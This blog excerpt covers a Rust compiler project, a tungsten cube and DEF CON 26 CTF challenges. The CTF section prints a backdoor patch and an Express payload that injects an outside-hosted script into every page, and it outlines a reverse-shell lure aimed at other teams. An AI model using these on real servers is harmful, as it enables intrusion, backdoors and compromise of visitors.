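    pub fn parse_expr(&mut self, min_bp: u8) -> Option<i64> {
        let mut lhs = self.parse_atom()?;
        while let Some(&op) = self.tokens.get(self.pos) {
            let bp = match binding_power(op) {
                Some(bp) if bp > min_bp => bp,
                _ => break,
            };
            self.pos += 1;
            // Passing `bp` as the new minimum makes equal-precedence operators
            // left-associative: `8 - 3 - 2` groups as `(8 - 3) - 2`.
            let rhs = self.parse_expr(bp)?;
            lhs = match op {
                Tok::Plus => lhs + rhs,
                Tok::Minus => lhs - rhs,
                Tok::Times => lhs * rhs,
                Tok::Divide => lhs.checked_div(rhs)?,
                Tok::Num(_) => return None,
            };
        }
        Some(lhs)
    }
}

// Evaluate a whole token slice, failing if anything is left over.
pub fn eval(tokens: &[Tok]) -> Option<i64> {
    let mut p = ExprParser::new(tokens);
    let value = p.parse_expr(0)?;
    if p.pos == tokens.len() {
        Some(value)
    } else {
        None
    }
}
```

Adding a precedence level is then a one-line change to `binding_power` rather than a new grammar rule and a new parsing function.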

Snapshot testing

Starting when we did our parser and continuing for the rest of our compiler, we made extensive use of snapshot testing with the insta crate. Snapshot testing (similar to expect tests) allows you to write tests which just provide the resulting data structure of some process and the testing system will create a “snapshot” of the result of that test in a file, and if the result ever changes it will cause a test failure and show you the diff between the snapshot file and the result it got. If the change was expected, you can then run a command to update the snapshot files that changed.

This was super useful for writing our parser: before we could parse full files and do anything with them, we could parse short snippets into AST types implementing the Rust Debug trait, and insta would create pretty-printed snapshots that we could inspect for correctness, and then commit to check for future regressions.

#[test]
fn test_statement() {
    let mut lexer = file_lexer("testdata/statements.java");
    let tokens = lexer.lex_all().unwrap();
    let mut parser = Parser::create(&tokens);

    let statement = parser.parse_statement();
    assert_debug_snapshot_matches!("statements", statement);
}

Later during the code generation phase we used this extensively to check our assembly output on test programs.

Semantic analysis

About half of our compiler is in the middle-end passes which compute information necessary for code generation and verify various correctness properties. This includes:

Resolving variable and type names.
Folding constant expressions like 5*3+2 into numbers.
Checking many different constraints of the Java class/interface hierarchy.
Checking that all statements are reachable and all non-void functions return.
Resolving types of all expressions and checking their correctness.

Visitor infrastructure

Most of the passes in the middle of our compiler only care about certain AST nodes, but need to act on those nodes anywhere they might occur in the AST. One way to do this would be to pattern match through the whole AST in every pass, but there’s a lot of nodes so that would involve a lot of duplication.

Instead we have a Visitor trait (like an interface in other languages) which can be implemented by a compiler pass. It has callbacks only for the events we actually need, which can run code at various points in the traversal of the AST, as well as modify the AST in place. All the callbacks have default implementations that do nothing so that passes only need to implement the methods they need.

// We use a dynamic error type here so we don't have to make the visitor generic and
// instantiate it a bunch for every error type
pub type VResult = Result<(), Box<dyn std::error::Error>>;

pub trait Visitor {
    // used for resolving variable references
    fn visit_var_ref(&mut self, _t: &mut VarRef) -> VResult {
        Ok(())
    }

    fn start_method(&mut self, _t: &mut Method) -> VResult {
        Ok(())
    }

    // `finish_` methods get passed the result of traversing their body so that they
    // can wrap errors to provide better location information
    fn finish_method(&mut self, _t: &mut Method, res: VResult) -> VResult {
        res
    }

    // like a `finish_` method except it doesn't need the result
    fn post_expr(&mut self, _t: &mut Expr) -> VResult {
        Ok(())
    }

    // ... a bunch of other methods
}

Passes that implement Visitor are driven by dynamically dispatched calls from the Visitable trait, which is implemented by every AST node and traverses the whole tree in evaluation order. A cool Rust feature we make good use of is “blanket impls” which make the logic for handling AST children that are in containers clean and uniform.

pub trait Visitable {
    fn visit(&mut self, v: &mut dyn Visitor) -> VResult;
}

impl<T: Visitable> Visitable for Vec<T> {
    fn visit(&mut self, v: &mut dyn Visitor) -> VResult {
        for t in self {
            t.visit(v)?;
        }
        Ok(())
    }
}

// ... other blanket impls for Option<T> and Box<T>

impl Visitable for TypeKind {
    fn visit(&mut self, v: &mut dyn Visitor) -> VResult {
        match self {
            TypeKind::Array(t) => t.visit(v)?,
            TypeKind::Ref(t) => t.visit(v)?,
            _ => (),
        }
        Ok(())
    }
}

impl Visitable for ForStatement {
    fn visit(&mut self, v: &mut dyn Visitor) -> VResult {
        v.start_for_statement(self)?;
        // closure allows us to use ? to combine results
        let res = (|| {
            self.init.visit(v)?;
            self.condition.visit(v)?;
            self.update.visit(v)?;
            self.body.visit(v)
        })();
        v.finish_for_statement(self, res)
    }
}

// ... many other Visitable implementations

This made a lot of our passes much easier. For example constant folding just overrides the post_expr method, checks if the children of an expression are constants and if so uses mem::replace to replace the node with a constant.
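As a rough illustration of that constant folding step, here is a self-contained sketch. The four-variant `Expr` enum and the hand-written recursion in `fold_constants` are stand-ins I made up for this example (in our compiler the traversal came from the visitor infrastructure), but `post_expr` does the same check-children-then-`mem::replace` move.

```rust
use std::mem;

// Hypothetical miniature expression type; the real AST has many more variants.
#[derive(Debug, PartialEq)]
pub enum Expr {
    Const(i32),
    Var(String),
    Add(Box<Expr>, Box<Expr>),
    Mul(Box<Expr>, Box<Expr>),
}

// Plays the role of a `post_expr` callback: it runs after the children of `e`
// have already been folded.
fn post_expr(e: &mut Expr) {
    let folded = match e {
        Expr::Add(a, b) => match (&**a, &**b) {
            // Java `int` arithmetic wraps on overflow, hence `wrapping_*`.
            (Expr::Const(x), Expr::Const(y)) => Some(x.wrapping_add(*y)),
            _ => None,
        },
        Expr::Mul(a, b) => match (&**a, &**b) {
            (Expr::Const(x), Expr::Const(y)) => Some(x.wrapping_mul(*y)),
            _ => None,
        },
        Expr::Const(_) | Expr::Var(_) => None,
    };
    if let Some(value) = folded {
        // Swap the constant in; the old subtree is returned and dropped here.
        let _old = mem::replace(e, Expr::Const(value));
    }
}

// Post-order traversal: fold the children first, then the node itself.
pub fn fold_constants(e: &mut Expr) {
    match e {
        Expr::Add(a, b) | Expr::Mul(a, b) => {
            fold_constants(a);
            fold_constants(b);
        }
        Expr::Const(_) | Expr::Var(_) => {}
    }
    post_expr(e);
}
```

Because children are folded before their parent, `5*3+2` collapses in two steps: first the multiplication becomes `15`, then the addition becomes `17`.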

Resolving names

One discussion we had is how to handle resolving type and variable names. The most obvious way was doing so by mutating the AST using an Option field that’s initially None. However our functional programmer instincts felt icky about this so we tried to think of a better way. Using an optional field also had the problem that we knew by the code generation phase that all variables would be resolved but the type system would still think they could be None so we’d need to unwrap() them every time we wanted to access them.

We first considered using a side table where we’d give every named reference an ID or hash it, then have a map from ID to resolved location that we created during the resolution stage. But we didn’t like how this would make debugging harder since we could no longer just print out our AST types with Debug to see all their information including resolutions. It also would require passing around quite a few side tables and doing lots of lookups in them by the later stages. It didn’t even solve the need for unwrap since the table access could theoretically not find the corresponding element.

Next we considered making all of our AST types generic with an annotation type parameter that started out as () but changed as the AST progressed through stages where it gained more info. The main problem with this is that each pass would need to re-build the entire AST, which would make easy visitor infrastructure much harder. Maybe if Rust had something like an automatically derivable Functor implementation it wouldn’t have been bad, but barring that it would need a lot of boilerplate. There were also multiple things we needed to annotate at various stages necessitating many parameters, and a lot of AST types, which would require a lot of refactoring our AST and parser to add a multitude of parameters.

So instead we just bit the bullet and used Option type fields, and I think it worked out well. We implemented a nice Reference<T, R> generic that had a raw and resolved field. We used it for both variable and type references. It had Hash and PartialEq implementations that only looked at the resolved value because that’s what mattered for data structures in later passes. It also had a special Debug implementation that made the output in snapshot tests nicer:

impl<T: fmt::Debug, R: fmt::Debug> fmt::Debug for Reference<T, R> {
    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
        if let Some(r) = &self.resolved {
            write!(f, "{:#?} => {:#?}", self.raw, r)
        } else {
            write!(f, "{:?}", self.raw) // only print the raw if not resolved yet
        }
    }
}
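The struct itself and its comparison impls aren't shown above, so here is a hedged reconstruction of roughly what they could look like. Only the `raw` and `resolved` field names and the "compare by resolved value only" behaviour come from the description; the `new` constructor and `count_distinct` are hypothetical, and the custom `Debug` impl is left out.

```rust
use std::collections::HashSet;
use std::hash::{Hash, Hasher};

// Hypothetical reconstruction: only the `raw` and `resolved` field names come
// from the post; everything else is assumed.
#[derive(Clone)]
pub struct Reference<T, R> {
    pub raw: T,
    pub resolved: Option<R>,
}

impl<T, R> Reference<T, R> {
    // References start out unresolved and are filled in by a later pass.
    pub fn new(raw: T) -> Self {
        Reference { raw, resolved: None }
    }
}

// Equality ignores `raw`: two spellings of the same target compare equal.
impl<T, R: PartialEq> PartialEq for Reference<T, R> {
    fn eq(&self, other: &Self) -> bool {
        self.resolved == other.resolved
    }
}

impl<T, R: Eq> Eq for Reference<T, R> {}

// Hashing must agree with equality, so it also looks only at `resolved`.
impl<T, R: Hash> Hash for Reference<T, R> {
    fn hash<H: Hasher>(&self, state: &mut H) {
        self.resolved.hash(state);
    }
}

// Example use in a later pass: count distinct resolved targets.
pub fn count_distinct(refs: Vec<Reference<String, u32>>) -> usize {
    refs.into_iter().collect::<HashSet<_>>().len()
}
```

One consequence of this design worth knowing about is that any two unresolved references compare equal, since both have `resolved == None`, so these impls are only meaningful after the resolution pass has run.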

Reference counting

In a number of different places, especially the class hierarchy checking and type checking phases, a lot of things needed to have the same pieces of information propagated to them. For example types bubbling up an expression or inherited methods bubbling down a tree. In a language like Java we’d just have multiple references to the same object, but in Rust for ownership reasons we couldn’t do that straightforwardly. We started out in some places by cloning things, which worked fine, but I realized I could just switch everything to use Rc to allow sharing.
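As a small illustration of the difference, here is a sketch of inherited methods being shared through `Rc` instead of deep-copied. `MethodSig`, `ClassInfo`, and `inherit` are hypothetical names invented for this example and don't correspond to our actual types.

```rust
use std::rc::Rc;

// Hypothetical types for illustration only.
#[derive(Debug, PartialEq)]
pub struct MethodSig {
    pub name: String,
    pub params: Vec<String>,
}

pub struct ClassInfo {
    pub name: String,
    pub methods: Vec<Rc<MethodSig>>,
}

// A subclass inherits by cloning the `Rc` handles. This bumps reference
// counts instead of deep-copying each signature's strings and vectors.
pub fn inherit(parent: &ClassInfo, name: &str) -> ClassInfo {
    ClassInfo {
        name: name.to_string(),
        methods: parent.methods.iter().map(Rc::clone).collect(),
    }
}
```

After `inherit`, parent and child point at the very same `MethodSig` allocation, which is the Rust equivalent of Java's "multiple references to the same object".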

I had an interesting moment where I thought “man it sucks that this code has to do all this reference count manipulation, that’s unnecessarily slow, maybe I should refactor this to use an arena or something”. Then I realized that if I had been writing in Swift I wouldn’t have given this a second thought because everything would be ref-counted, and even worse than the Rust version, atomically ref-counted. Writing code in Rust makes me feel like I have an obligation to make code as fast as possible in a way other languages don’t, just by surfacing the costs better. Sometimes I need to remind myself that actually it’s fast enough already.

Code Generation

The course requires that we generate textual NASM x86 assembly files. Given that we only need to output to those, we decided we didn’t need an intermediate abstraction for generating assembly, and our code generation stage could just use Rust string formatting. This would make our code simpler, easier and also allow us to more easily include comments in the generated assembly.

The fact that we preserved source span information through our whole compiler and could generate comments came in handy because we could output comments containing the source expression/statement location for every single generated piece of code. This made it much easier to track down exactly which piece of code was causing a bug.
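Here is a minimal sketch of what emitting those location comments with plain string formatting can look like. The `Span` and `Asm` types and the exact comment layout are assumptions made for this example, not our real code; the only fixed point is that NASM comments start with `;`.

```rust
use std::fmt::Write;

// Hypothetical span type; the post's `Spanned` struct is not shown in detail.
#[derive(Clone, Copy, Debug)]
pub struct Span {
    pub line: u32,
    pub col: u32,
}

// Hypothetical output buffer for generated assembly.
pub struct Asm {
    pub out: String,
}

impl Asm {
    pub fn new() -> Self {
        Asm { out: String::new() }
    }

    // Emit a NASM comment naming the source construct and its location.
    pub fn comment(&mut self, what: &str, span: Span) {
        // Writing to a `String` cannot fail, so unwrapping the `Result` is safe.
        writeln!(self.out, "; {} at {}:{}", what, span.line, span.col).unwrap();
    }

    // Emit one indented instruction line.
    pub fn instr(&mut self, text: &str) {
        self.out.push_str("    ");
        self.out.push_str(text);
        self.out.push('\n');
    }
}

// Example generator for an integer literal expression.
pub fn gen_int_literal(asm: &mut Asm, value: i32, span: Span) {
    asm.comment("int literal", span);
    asm.instr(&format!("mov eax, {}", value));
}
```

With every generator function starting with a `comment` call like this, a wrong instruction in the output can be traced back to a source line and column just by scrolling up to the nearest comment.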

A somewhat annoying Rust thing we ran into is that we could find two easy ways of formatting to a string, both of which had an issue:

use std::fmt::Write; // needed for `writeln!` to target a String

let mut s = String::new();
// Requires a Result return type or unwrap, even though it won't ever fail.
// Generates a bunch of garbage error handling LLVM needs to optimize out.
writeln!(s, "mov eax, {}", val)?;
// Allocates an intermediate String which it then immediately frees
s.push_str(&format!("mov eax, {}", val));

My two teammates worked on the initial stages of code generation in parallel and each of them chose a different fork of this tradeoff, and by that close to the end of the course our consistency standards had relaxed, so our code generation has both.

Usercorn

Our compiler was supposed to output Linux ELF binaries and link to a runtime that made Linux syscalls. However, our entire team used macOS. Rewriting the runtime for macOS would have been somewhat annoying since syscalls aren’t always as easy and well documented on macOS as Linux. It also would have added an annoying delay to running our tests and made the harness more complex if we had to scp the binaries to a Linux server or VM.

I remembered that my internet friend had written a cool tool called usercorn that used the Unicorn CPU emulator plus some fanciness to run Linux binaries on macOS as if they were normal macOS binaries (or vice versa and a bunch of other things). It was straightforward to build a self-contained version that I could check into our repository and use in our tests to run our binaries. My teammate then got together a macOS build of ld that could link Linux ELF binaries and included it.

We could also use usercorn to output a trace of all the instructions executed and registers modified by our programs, and this came in handy quite a few times for debugging our code generation.

I ran into one problem where a test program that did a lot of allocation was 1000x slower under usercorn than on a real Linux server. Luckily I knew the author and I just sent him the offending binary and he quickly figured it was due to an inefficient implementation of the brk syscall which reasonable programs don’t use for every single memory allocation like the runtime the course provided did. He quickly figured out how to make it more efficient and pushed a fix later that evening which solved my problem. He’s pretty awesome, subscribe to his Patreon!

I then shared our pre-compiled bundle of usercorn and ld (with the bug fix for the assignment tests) with a few other teams I knew who used macOS so they could have an easier time testing as well.

Conclusion

Overall I’m proud of how our compiler turned out. It was a fun project and my teammates were excellent. I also think Rust ended up being a good choice of implementation language, especially the powerful enums and pattern matching. The main downsides of Rust were the long compile times (although apparently comparable to a group that did their compiler in C++), and the fact that sometimes we had to do somewhat more work to satisfy the borrow checker.

One of the most interesting learning experiences from the project was when afterwards I talked to some other teams and got to compare what it was like to do the same project in different languages and with different design decisions. I’ll talk about that in an upcoming post!

My Tungsten Cube

2019-03-03T00:00:00+00:00

A few months ago I bought a featureless cube of tungsten. It’s 1.5 inches across and cost $130, but I argue it was one of the best purchases I’ve made recently.

Why would I spend so much money on a cube? Well it’s really dense. Tungsten is one of the densest elements, over twice the density of steel. My cube weighs one kilogram despite being pretty small. The first time I held a friend’s tungsten cube I was blown away: it felt like some otherworldly force was pulling the cube down into my hand (spoiler: it was gravity). Whenever I show people my cube they consistently find it really cool and it’s fun to be able to so easily share a unique experience like that.

Even after the initial surprise wore off, I still find it just really satisfying to hold. Ever hold something with satisfying heft? Well it’s like the platonically purest amplified form of that satisfaction. I keep it on my desk and turn it around in my hands while I’m thinking.

The cool thing about it being a featureless hunk of extremely hard, durable metal that doesn’t really oxidize away, is that it will last for a long time. I expect I’ll continue getting value out of having this cube on my desk for at least 5 years and probably more. Given how much I fidget with the cube and enjoy owning it, I figure I definitely get more than $2/month worth of value out of it.

I struggled a lot with deciding to buy a cube. It felt wrong to spend so much money on a featureless hunk of metal. Money is for buying fancy doo-dads, or large things, or hotel nights, or any number of other things that cost about as much while delivering arguably less value. On the other hand there was something appealing to me about buying an object that was so platonically good. It was just a really dense cube that I could derive a pure and weird form of satisfaction from holding.

Anyhow, tungsten cubes, 10/10 would recommend. There’s a reason they have so many 5 star Amazon reviews. Maybe some day I’ll work up the courage to buy a $500 one that’s over 10 pounds like my housemate last term did.

Edit 2021-08-26: Since this ended up on HN today, I’ll mention that in September of 2019 I bought a 3kg tungsten sphere to add to my collection. It has beautiful turning marks that give it nice anisotropic reflections, which the rendering nerd in me appreciates. It’s also really nice to roll around in my hand, and is 3x heavier than my cube. It sits on a very nice walnut stand a coworker made for me on his lathe and CNC router. I still keep the cube on my desk at work though since it’s a better size and shape for casually fidgeting with.

I got it from a custom tungsten products supplier on Alibaba as a one-off in a custom size, since it was almost half the price of a similar sphere on Amazon, although it did take a while to arrive.

Here’s a photo of it on my Lichtenberg figure coffee table, which I got on Etsy from a seller who unfortunately doesn’t make them anymore, because they’re amazing:

DEF CON 26 CTF Writeups: reverse, doublethink, bew, reeducation

2018-08-16T00:00:00+00:00

Recently I flew to Vegas to attend the DEF CON 26 CTF with (Samurai), the team I played with when we won the qualifiers. I had a lot of fun and got very little sleep, working two consecutive 20 hour days and finishing off with another 4 hours of contest at the end.

As a programmer entering CTF with only a little bit of reverse engineering experience and no exploit development skills, I was happy that the organizers included new King of the Hill format challenges this year, which I found I could contribute nicely to since they tended to mix in more programming with the hacking. I also made sure to spend some time poking around other challenge binaries in Binary Ninja to hone my reverse engineering skills, although I only managed to make a meaningful contribution doing this with reeducation.

reverse

The first challenge released and the first I worked on was reverse. It was a service with a client binary and a remote server that presented a curses interface for completing disassembly and assembly puzzles like filling in the line of assembly that matched some bytes of machine code. There were multiple “level”s consisting of a bunch of puzzles, solving them got you points and let you move to the next level, and each level was a new type of puzzle.

While a few of us in the hotel suite got started on figuring out how we wanted to automate it, people on the floor started solving puzzles manually, then aegis gradually built up a UI automation script that copied data from his terminal, parsed it, ran it through command line (dis)assembler tools and typed the answers.

Back in the hotel, a couple of us started on parsing the client output out of the VT100 but a teammate figured out the network protocol the client used so we started using that directly. The first level could actually be solved using an info leak that was present in the protocol but didn’t show up in the client, but this didn’t work for level 2 and up.

We then integrated the solvers for levels 1-4 from aegis’s automation into our script so aegis could stop having his computer taken over by UI automation every round.

We ran into a problem though, we couldn’t get through level 5 since the problems seemed nonsensical and impossible. There just wasn’t enough information in the question to choose the right answer. We realized that there must be some way to cheat to solve it.

Luckily someone else on our team had been reversing the client and fuzzing the network protocol and had discovered a number of helpful tricks like the ability to not spend the limited “coins” we had to attempt challenges, and to restart a level as much as we wanted. After aegis noted that he saw duplicate assembly lines in his logs and that we should try dumping, I started on a script. I modified our solver Python code to use the protocol tricks to quickly request level 1 problems in a pipelined way to not have to wait for round trips and dump them to a file. Then aegis tuned up the script and ran it on the CTF floor dumping thousands of lines of assembly per second, eventually converging around 280k unique lines.

I then started on using these dumps to write better versions of our solvers (which previously often failed to determine the correct answer) by cheating with the known lines. This allowed us to resolve the difference between say call sub_1432 and call sub_2532 without knowing where the procedures were and made our solving simpler and more robust. We also incorporated an underflow bug a teammate discovered from poking at the server that gave us an extra 255 points per question. Unfortunately the dump didn’t give us any clues as to how to solve level 5, and unfortunately the dumped binary didn’t appear to be the server like we’d hoped. At this point the challenge was close to closing so we gave up and started on other problems.

After the contest we learned from the organizers there was a broken protocol instruction discoverable by fuzzing that allowed you to leak the server binary. You could then find an exploit allowing you to give yourself arbitrarily many points.

doublethink

This was another King of the Hill challenge, released just before the contest shut down on the first day. It was a fun problem that motivated me to stay up nearly all night.

The gist of the challenge was that you submitted a single 4KB chunk of binary that you could then execute against a number of different architectures using various emulators, the more architectures you got to print the flag the higher your score. So the goal was to write a polyglot piece of shellcode that opened a flag file and wrote it out on modern architectures, or printed it from a known memory address on older architectures.

We realized we needed to write flag-printing shellcode for a bunch of architectures separately and then put them together in one blob with a sequence of jump instructions at the front, one for each architecture, jumping to that architecture’s payload, where all the other architectures’ jumps before it didn’t stop the emulator or jump somewhere unintended. Another interesting twist is that a lot of the old architectures had bytes/words with varying numbers of bits, which were just chopped off the file you gave by concatenating all the bytes in binary and chunking.
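To make the bit-level chunking concrete, here is a sketch of packing odd-width words into a byte file and reading them back. It is an illustration and not the scripts we used (those were Python), and it assumes words are laid out most-significant bit first with zero padding at the end; the post doesn't record which bit order the challenge actually used.

```rust
// Assumption: words are laid out most-significant bit first, and the final
// byte is zero-padded. The challenge's real bit order is not stated here.
pub fn pack_words(words: &[u32], bits_per_word: u32) -> Vec<u8> {
    assert!((1..=32).contains(&bits_per_word));
    let mask = (1u64 << bits_per_word) - 1;
    let mut out = Vec::new();
    let mut acc: u64 = 0; // pending bits, held in the low end of `acc`
    let mut acc_bits: u32 = 0; // how many bits of `acc` are pending
    for &w in words {
        acc = (acc << bits_per_word) | (u64::from(w) & mask);
        acc_bits += bits_per_word;
        // Flush every complete byte, highest bits first.
        while acc_bits >= 8 {
            acc_bits -= 8;
            out.push((acc >> acc_bits) as u8);
        }
        // Keep only the bits that have not been written yet.
        acc &= (1u64 << acc_bits) - 1;
    }
    if acc_bits > 0 {
        // Left-align the leftover bits in a final, zero-padded byte.
        out.push((acc << (8 - acc_bits)) as u8);
    }
    out
}

// The inverse view: how an emulator with `bits_per_word`-bit words would chop
// up the same file. Trailing bits that don't fill a whole word are dropped.
pub fn unpack_words(bytes: &[u8], bits_per_word: u32) -> Vec<u32> {
    assert!((1..=32).contains(&bits_per_word));
    let mask = (1u64 << bits_per_word) - 1;
    let mut out = Vec::new();
    let mut acc: u64 = 0;
    let mut acc_bits: u32 = 0;
    for &b in bytes {
        acc = (acc << 8) | u64::from(b);
        acc_bits += 8;
        while acc_bits >= bits_per_word {
            acc_bits -= bits_per_word;
            out.push(((acc >> acc_bits) & mask) as u32);
        }
        acc &= (1u64 << acc_bits) - 1;
    }
    out
}
```

Under that assumption, two 12-bit PDP-8 words occupy exactly three bytes, which is why the same file looks completely different to each architecture and why the jump sequence had to be designed at the bit level.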

We decided to start by developing a bunch of payloads in parallel that we would assemble later. I started with PDP-8, where after reading the instruction reference I found a Hello World program and a matching assembler. The first challenge was that the output format of the assembler didn’t match the format the challenge wanted, so I had to write a 50 line python script to parse the assembled output and put it together at the bit level (because of the 12 bit bytes). After that I checked it printed Hello World against the provided testing Docker image, then modified the program to print the flag, and made it much shorter.
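
The bit-level packing step can be sketched roughly as follows. This is a minimal illustration, not the original 50 line script: it assumes the assembler output has already been parsed into a list of integer words, that words are concatenated most-significant-bit first, and that the last byte is padded with zero bits. The name `pack_words` is made up for this example.

```python
def pack_words(words, bits_per_word=12):
    """Concatenate fixed-width words bit by bit and return them as bytes.

    Assumptions (not confirmed by the challenge): words go in
    most-significant-bit first, and the final partial byte is zero padded.
    """
    acc = 0    # all bits seen so far, as one big integer
    nbits = 0  # how many bits are held in acc
    for w in words:
        if not 0 <= w < (1 << bits_per_word):
            raise ValueError("word %o does not fit in %d bits" % (w, bits_per_word))
        acc = (acc << bits_per_word) | w
        nbits += bits_per_word
    pad = (-nbits) % 8  # zero bits needed to reach a byte boundary
    acc <<= pad
    nbits += pad
    return acc.to_bytes(nbits // 8, "big")
```

Two 12 bit words fill exactly three bytes, so `pack_words([0o7402, 0o0001])` gives the bytes `f0 20 01`.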

I followed a similar process to construct a payload for PDP-10. After a bunch of architecture research and miscellaneous searching I found an assembler as part of someone’s FORTH project. I translated a Hello World program I found into that assembler’s syntax and modified the assembler code to print the info I needed, and again wrote a Python script to parse the output and munge the bits into the format we needed, then again modified the program to print the flag.

By this point other members of my team had written payloads for clemency, mix, amd64 and riscv which we considered sufficient to start pulling them together. I started by writing a script to print a file as the bytes of varying bit widths including values in octal (which PDP system ISAs matched well with) so we could debug the jump train. Then I wrote a script to assemble jump sequences and payloads for different architectures at bit-level offsets. Then aegis and I worked together for a while and found a sequence of jumps, nops and padding that worked for amd64, pdp-8 and pdp-10 together. After I went to bed a teammate managed to patch in a very short mix shellcode into ours, leaving us with a 4-polyglot for the start of the next day.
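
A debugging dump like the one described could look something like this. It is a sketch under assumptions rather than the original script: it treats the file as one long bit string read most-significant-bit first, drops any leftover bits at the end, and the name `dump_words` is hypothetical.

```python
def dump_words(data, bits_per_word):
    """Split bytes into fixed-width words (MSB first) and format each in octal.

    Trailing bits that do not fill a whole word are dropped (an assumption).
    """
    total_bits = len(data) * 8
    value = int.from_bytes(data, "big")
    digits = -(-bits_per_word // 3)  # octal digits needed per word, rounded up
    mask = (1 << bits_per_word) - 1
    words = []
    for i in range(total_bits // bits_per_word):
        shift = total_bits - (i + 1) * bits_per_word
        words.append("%0*o" % (digits, (value >> shift) & mask))
    return words
```

Viewing the same blob with `bits_per_word` set to 8, 12 and 36 shows how each emulator would see the front of the file.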

The next day I spent a bunch of hours with aegis trying to get a working sequence including riscv and failing, and improving tooling and commenting it so others could try integrating more jumps. We mostly failed because things had too many constraints to fit in our heads, so by the time we thought we were approaching a solution we forgot an earlier constraint and went down a dead end. Eventually a teammate wrote a pdp-1 payload and that ISA had few constraints and slotted pretty easily into our existing jump train, getting us to a 5-polyglot. I then tried and failed to integrate hexagon and ibm-1401. By that time the challenge was close to ending and we decided to move on, with clemency, hexagon, ibm-1401, and riscv payloads unused, which was sad.

It later turned out that this challenge too was possible to exploit to get an artificially high score, according to the organizers and our later investigation. It was possible to use the amd64 shellcode which was run directly (as nobody) concurrently from multiple submissions to fake a correct flag printing. This allowed two teams to get “fake” scores of 9 and 11, although PPP (the 2nd place team) did actually create an 8-polyglot.

bew

Released just before the end of the second day, this was the next challenge I worked on. It was a web app with a text field you could use to add text to a file that was printed on another page.

While the contest servers were still up, we looked into the source and realized that the express-validator dependency had been replaced by an entirely different library using a WebAssembly module compiled with Emscripten. All inputs to the text file were passed through the validator library before being added to the text file.

After some theorizing about possible exploits involving using the Emscripten standard library emulation to use the Node fs module to get the flag, we noticed on the submissions page that people were submitting exploits involving plain JS code and it seemed to work. We were confused but aegis started putting together our own flag retrieval payload that could get past the pre-filters while other members of our team started scraping flags other teams had retrieved with a script.

Eventually we found that the way the service worked was dumber than we thought. The WebAssembly did some preliminary filtering looking for use of require or the fs module, then it passed the input to an external handler (below) which just took the input and eval’d it in the Node server process, and put the input in the text file if it threw an exception. This looked initially like it was rejecting JS and accepting text because most text triggers JS errors. The basic exploits people were using just obscured the require and fs use and used that to get the flag and put it in a public place, which we were also scraping without even deploying our own exploit!

// The handler that the WebAssembly called into
var ASM_CONSTS = [function($0) { str = Pointer_stringify($0); try { eval(str); return 1;} catch(err) { return 0; } console.log(eval('const fs = require("fs");fs.writeFile("/tmp/test.txt", "testwrites")') + 'WEBASS got ' + $0); }];

After the contest servers closed for the night, we did some thinking about the challenge. Based on the large number of bytes you were allowed to patch only in the WebAssembly file, it seemed the intended patching solution was to write an actual JS validator, compile it to WASM and patch it in, with functional tests likely verifying that the web app still accepted text and rejected JS. This sounded like a lot of work, so we thought we’d poke around with our full remote code execution some more.

I realized that I could patch the server dynamically by just reassigning the ASM_CONSTS variable (in scope!) to not eval the string and either reject or accept all submissions, fully closing the eval hole. This would persist until the server was restarted, and based on the persistent text file we knew that the server was kept alive between requests. I eventually refined this into a version that left a back door so that we could still exploit the server if we messed up, and also made sure our exploits (containing / and _) couldn’t accidentally end up in the public text file:

ASM_CONSTS[0] = function(ptr) { str = Pointer_stringify(ptr); if(str.includes("DAT_BEST_BACK_DOOR_SECRET")) eval(str); return (str.includes("_") || str.includes("/")) ? 1 : 0; }

Meanwhile aegis figured out that he could modify the express web server handler chain to do all sorts of fun things. First he figured out how to take down all the pages, then how to add a backdoor flag page by mounting root as a public directory, then how to change responses to ones of our choosing.

I talked this over with aegis and we realized this was so absurdly easy and powerful that the organizers couldn’t have thought of it. We realized we could insert a backdoor that let us get the flag and then close the door to all the other teams, with the only weakness being if another team realized this and closed the door first. If no other teams figured this out and beat us then we would get all the flags and no other team would get any. We could also close our own door without inserting the backdoor.

We took this plan to the evening team meeting and then bool (team founder Steve Vittitoe) came up with an amazing idea: Not only do we backdoor and close the door, but we add a script to all the pages that turns the page into a fake scoreboard on blur with a fake new challenge that gives us a reverse shell on their machine! After a moment of silence as we were struck by the brilliance of his idea, we enthusiastically started brainstorming our plan.

We realized that if we were lucky and were the only team to figure this out, we needed to not leak our exploit publicly so other teams could immediately figure it out themselves. So I started by developing a thrower script for our exploits that could be run automatically and would ensure a team was backdoored and the door was closed without leaking our exploit in case of a patched team that accepted all submissions:

Check our flag backdoor, if it’s there we’re done.
Submit a canary piece of bogus JS code that used all the syntactic constructs our exploits used, if it went through then submitting our exploits would leak them, so abandon.
Install the backdoor express chain rewriting code.
Check that we can retrieve the flag, if not bail and log an error.
Close the door and check that the door was successfully closed and log if not.
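
The control flow of those steps can be sketched like this. It is only an outline of the logic, not the real thrower: every callable passed in (`check_backdoor`, `submit_canary`, `install_backdoor`, `close_door`, `log`) is a hypothetical stand-in for the HTTP requests involved, and the status strings are made up.

```python
def throw(target, check_backdoor, submit_canary, install_backdoor, close_door, log):
    """Run the five steps against one target and return a short status string.

    All callables are hypothetical stand-ins:
      check_backdoor(target) -> True if our flag backdoor answers
      submit_canary(target)  -> True if the bogus JS showed up publicly
      install_backdoor(target), close_door(target) -> send the payloads;
      close_door returns True once the door is verified closed
    """
    if check_backdoor(target):
        return "already-backdoored"
    if submit_canary(target):
        # The canary went through, so real exploits would be leaked too.
        return "abandoned"
    install_backdoor(target)
    if not check_backdoor(target):
        log("backdoor failed on %s" % target)
        return "backdoor-failed"
    if not close_door(target):
        log("door still open on %s" % target)
        return "door-open"
    return "closed"
```

Checking the canary before sending anything real is what keeps the exploit private when a team has patched their server to accept every submission.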

Next I worked on improving aegis’s payload to place the flag backdoor at a less obvious place than /flag which required some URL rewriting and also crafting an Express chain rewriting payload based on his research that could insert a script tag into all pages without modifying the rest of the page. This is the payload I ended up with:

// Part 1: exposes the flag at /flagaaa
s = process.mainModule.children[0].children[1].exports.static('/');
process.mainModule.children[0].exports._router.stack[5].handle = function(req, res, next) {
  if(req.url && req.url.includes('flag')) {
    req.url = req.url.substring(0, req.url.length-3);
  }
  return s(req, res, next);
};
// Part 2: replaces </body> with our script tag on every response
process.mainModule.children[0].exports._router.stack[3].handle = function(req, res, next) {
    var oldSend = res.send;

    res.send = function(data){
        data = data.replace(/(<\/body>)/, "<script src='https://our-xss-domain.redacted/ourpayload.js'></script></body>");
        oldSend.apply(res, [data]);
    }
    next();
};

